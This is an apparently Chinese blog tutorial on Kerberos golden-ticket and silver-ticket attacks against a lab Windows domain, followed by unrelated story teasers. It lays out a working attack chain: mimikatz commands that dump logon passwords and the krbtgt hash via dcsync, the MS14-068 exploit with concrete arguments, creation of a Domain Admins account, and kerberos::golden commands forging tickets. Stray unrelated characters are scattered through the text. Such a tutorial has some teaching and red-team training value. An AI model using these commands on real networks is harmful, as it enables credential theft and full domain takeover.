黃金票據(jù)和白銀票據(jù)攻擊及其原理介紹

票據(jù)傳遞攻擊

這里介紹域內(nèi)常用的兩種攻擊方式:黃金票據(jù)Golden ticket、白銀票據(jù)SILVER TICKET

另外,學(xué)習(xí)過Kerberos認(rèn)證過程的同學(xué)會(huì)更加容易的理解兩種票據(jù)攻擊的原理骑科,沒有看過Kerberos認(rèn)證的同學(xué),我推薦還是去看看我之前寫的Kerberos認(rèn)證過程

相關(guān)應(yīng)用

Ms14-068
PSexec
mimikatz

金票Golden ticket

原理

在Kerberos認(rèn)證中,Client通過AS(身份認(rèn)證服務(wù))認(rèn)證后,AS會(huì)給Client一個(gè)
Logon Session Key和TGT,而Logon Session Key并不會(huì)保存在KDC中倍阐,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash主儡,就可以偽造TGT和Logon Session Key來進(jìn)入下一步Client與TGS的交互。而已有了金票后,就跳過AS驗(yàn)證,不用驗(yàn)證賬戶和密碼,所以也不擔(dān)心域管密碼修改县恕。

特點(diǎn)

不需要與AS進(jìn)行交互东羹,需要用戶krbtgt的Hash

具體操作介紹

一、偽造憑據(jù)忠烛,提升域內(nèi)普通用戶的權(quán)限

我們現(xiàn)在以一個(gè)本地administrator用戶登錄域內(nèi)的一個(gè)主機(jī)中属提。

通過命令:net config workstation,可知域名為:cyberpeace和其他信息。

通過命令:nltest /dsgetdc:域名,可知DC主機(jī)名為:scene美尸。

上傳mimikatz,以管理員權(quán)限運(yùn)行CMD,再去執(zhí)行mimikatz:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

打開生成的log.txt可以看到有一個(gè)域內(nèi)用戶devuser,且密碼是HOTdev123456

使用用戶devuser登錄到域內(nèi),whoami查看下當(dāng)前用戶為devuser:

這里利用MS14-068來提權(quán),先檢查下是否有MS14-068, CVE編號(hào)CVE-2014-6324,補(bǔ)丁為 3011780 : systeminfo |find "3011780",如果返回為空就說明沒有打補(bǔ)丁,存在漏洞,需要注意的是域內(nèi)普通用戶提權(quán)成功后是有時(shí)效性的冤议。

執(zhí)行:dir \scene.cyberpeace.com\c$,提醒權(quán)限不夠:

上傳mimikatz和MS14-068提權(quán)工具师坎,whoami /user或者whoami/all查看devuser用戶的suid:

使用MS14-068偽造票據(jù):
執(zhí)行命令:C:\MS14-068>MS14-068.exe -u devuser@cyberpeace.com -p HOTdev123456 -s S-1-5-21-9 7341123-1865264218-933115267-1108 -d scene.cyberpeace.com恕酸,會(huì)在當(dāng)前目錄下生成一個(gè)憑證。

使用方法:

ms14-068.exe -u 域成員名@域名 -p 域成員密碼 -s 域成員sid -d 域控制器地址 

使用mimikatz清空之前緩存的憑證胯陋,導(dǎo)入偽造的憑證:

mimikatz # kerberos::purge  //清空票據(jù)
mimikatz # kerberos::ptc 票據(jù)文件地址

再輸入dir \\scene.cyberpeace.com\c$蕊温,發(fā)現(xiàn)訪問成功,現(xiàn)在我們有域管的權(quán)限:

添加域管用戶aaa:

net user aaa Qwe123... /add /domain
net group "Domain Admins" aaa /add /domain

二遏乔、偽造金票

偽造金票的所需條件
1义矛、域名稱
2、域的SID值
3盟萨、域的KRBTGT賬號(hào)的HASH
4凉翻、偽造任意用戶名

登錄aaa域管用戶,執(zhí)行whoami可以看到是aaa用戶:

使用一下命令導(dǎo)出用戶krbtgt的hash:

mimikatz(commandline) # privilege::debug
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /all /csv
mimikatz(commandline) # lsadump::dcsync /domain:cyberpeace.com /user:krbtgt

再執(zhí)行以下命令可以看到krbtgt用戶的SID:

利用mimikatz生成金票生成.kirbi文件并保存:

mimikatz.exe "kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi" exit

/admin:偽造的用戶名
/domain:域名稱
/sid:SID值捻激,注意是去掉最后一個(gè)-后面的值
/krbtgt:krbtgt的HASH值
/ticket:生成的票據(jù)名稱    //不是寫入內(nèi)存中的命令噪矛!

三,金票的使用(普通域賬戶铺罢,利用黃金票據(jù),創(chuàng)建域管賬戶)

登錄域內(nèi)普通用戶残炮,通過mimikatz中的kerberos::ptt功能將ticket.kirbi導(dǎo)入內(nèi)存中韭赘。

mimikatz # kerberos::purge         
mimikatz # kerberos::ptt ticket.kirbi

此時(shí)嘗試創(chuàng)建一個(gè)ccc的域管賬號(hào),命令執(zhí)行成功:


銀票SILVER TICKET

原理

如果說黃金票據(jù)是偽造的TGT,那么白銀票據(jù)就是偽造的ST势就。
在Kerberos認(rèn)證的第三部泉瞻,Client帶著ST和Authenticator3向Server上的某個(gè)服務(wù)進(jìn)行請求,Server接收到Client的請求之后,通過自己的Master Key 解密ST,從而獲得 Session Key苞冯。通過 Session Key 解密 Authenticator3,進(jìn)而驗(yàn)證對方的身份,驗(yàn)證成功就讓 Client 訪問server上的指定服務(wù)了袖牙。
所以我們只需要知道Server用戶的Hash就可以偽造出一個(gè)ST,且不會(huì)經(jīng)過KDC,但是偽造的門票只對部分服務(wù)起作用。

特點(diǎn)

1.不需要與KDC進(jìn)行交互 2.需要server的NTLM hash

具體操作介紹

一舅锄、偽造憑據(jù)鞭达,提升域內(nèi)普通用戶的權(quán)限

我們現(xiàn)在以一個(gè)本地administrator用戶登錄域內(nèi)的一個(gè)主機(jī)中。

通過命令:net config workstation,可知域名為:cyberpeace和其他信息

通過命令:nltest /dsgetdc:域名,可知DC主機(jī)名為:scene。

上傳mimikatz,以管理員權(quán)限運(yùn)行CMD,再去執(zhí)行mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

打開生成的log.txt可以看到有一個(gè)域內(nèi)用戶Hellen,且密碼是Hellen1818畴蹭。

使用用戶Hellen登錄到域內(nèi),whoami查看下當(dāng)前用戶為Hellen:

同樣先檢查下是否有MS14-068漏洞

執(zhí)行:dir \scene.cyberpeace.com\c$坦仍,提醒權(quán)限不夠:

上傳mimikatz和MS14-068提權(quán)工具,whoami /user或者whoami/all查看devuser用戶的suid:

使用MS14-068偽造票據(jù):
執(zhí)行命令:MS14-068.exe -u Hellen@cyberpeace.com -p Hellen1818 -s S-1-5-21-2718660907-658632824-2072795563-1110 -d DomainControl.cyberpeace.com叨襟,會(huì)在當(dāng)前目錄下生成一個(gè)憑證繁扎。

使用方法:

ms14-068.exe -u 域成員名@域名 -p 域成員密碼 -s 域成員sid -d 域控制器地址

使用mimikatz清空之前緩存的憑證,導(dǎo)入偽造的憑證:

mimikatz # kerberos::purge  //清空票據(jù)
mimikatz # kerberos::ptc 票據(jù)文件地址

再輸入dir \\scene.cyberpeace.com\c$糊闽,發(fā)現(xiàn)訪問成功梳玫,現(xiàn)在我們有域管的權(quán)限:

添加域管用戶ccc:

net user ccc Qwe1234/add /domain
net group "Domain Admins" cccc /add /domain

二、偽造銀票

登錄上面創(chuàng)建的域管用戶右犹,用管理員權(quán)限打開CMD提澎,cd 到 mimikatz 存放的目錄,去執(zhí)行mimikatz的命令傀履,得到SID和NTLM虱朵,

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

把HASH文件保存到本地,在重新登錄到域內(nèi)機(jī)器的本地賬戶钓账,將hash文件和mimikatz復(fù)制進(jìn)去:
先使用mimikatz清空票據(jù)碴犬,再導(dǎo)入偽造的票據(jù),具體偽造票據(jù)的命令:

kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt

使用方法:
kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目標(biāo)服務(wù)器主機(jī)名> /service:<服務(wù)類型> /rc4:<NTLM Hash> /user:<用戶名> /ptt

其中的用戶名可以隨便寫

服務(wù)類型可以從以下內(nèi)容中來進(jìn)行選擇,因?yàn)槲覀儧]有TGT去不斷申請ticket梆暮,所以只能針對某一些服務(wù)來進(jìn)行偽造


測試一下服协,成功執(zhí)行dir \\scene.cyberpeace.com\c$ ,并且可以創(chuàng)建域管賬號(hào):

金票和銀票的區(qū)別

獲取的權(quán)限不同

金票:偽造的TGT,可以獲取任意Kerberos的訪問權(quán)限
銀票:偽造的ST啦粹,只能訪問指定的服務(wù)偿荷,如CIFS

認(rèn)證流程不同

金票:同KDC交互,但不同AS交互
銀票:不同KDC交互唠椭,直接訪問Server

加密方式不同

金票:由krbtgt NTLM Hash 加密
銀票:由服務(wù)賬號(hào) NTLM Hash 加密


至此跳纳,金銀票據(jù)的介紹就結(jié)束了,謝謝觀看贪嫂,若有疑問請留言寺庄,若有錯(cuò)誤請指教。

推薦我的另一篇內(nèi)網(wǎng)滲透的文章:內(nèi)網(wǎng)滲透


大佬隨手給個(gè)贊唄 0.0


最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末力崇,一起剝皮案震驚了整個(gè)濱河市斗塘,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌亮靴,老刑警劉巖馍盟,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異茧吊,居然都是意外死亡贞岭,警方通過查閱死者的電腦和手機(jī)八毯,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來曹步,“玉大人宪彩,你說我怎么就攤上這事〗不椋” “怎么了尿孔?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 文/不壞的土叔 我叫張陵,是天一觀的道長筹麸。 經(jīng)常有香客問我活合,道長,這世上最難降的妖魔是什么物赶? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • 正文 為了忘掉前任白指,我火速辦了婚禮,結(jié)果婚禮上酵紫,老公的妹妹穿的比我還像新娘告嘲。我一直安慰自己,他們只是感情好奖地,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,871評論 6 398
  • 文/花漫 我一把揭開白布橄唬。 她就那樣靜靜地躺著,像睡著了一般参歹。 火紅的嫁衣襯著肌膚如雪仰楚。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 那天犬庇,我揣著相機(jī)與錄音僧界,去河邊找鬼。 笑死臭挽,一個(gè)胖子當(dāng)著我的面吹牛捂襟,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播欢峰,決...
    沈念sama閱讀 40,999評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼笆豁,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了赤赊?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 序言:老撾萬榮一對情侶失蹤煞赢,失蹤者是張志新(化名)和其女友劉穎抛计,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體照筑,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡吹截,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,543評論 3 342
  • 正文 我和宋清朗相戀三年瘦陈,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片波俄。...
    茶點(diǎn)故事閱讀 40,675評論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡晨逝,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出懦铺,到底是詐尸還是另有隱情捉貌,我是刑警寧澤,帶...
    沈念sama閱讀 36,354評論 5 351
  • 正文 年R本政府宣布冬念,位于F島的核電站趁窃,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏急前。R本人自食惡果不足惜醒陆,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,029評論 3 335
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望裆针。 院中可真熱鬧刨摩,春花似錦、人聲如沸世吨。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽另假。三九已至像屋,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間边篮,已是汗流浹背己莺。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留戈轿,地道東北人凌受。 一個(gè)月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 正文 我出身青樓,卻偏偏與公主長得像思杯,于是被迫代替她去往敵國和親胜蛉。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,685評論 2 360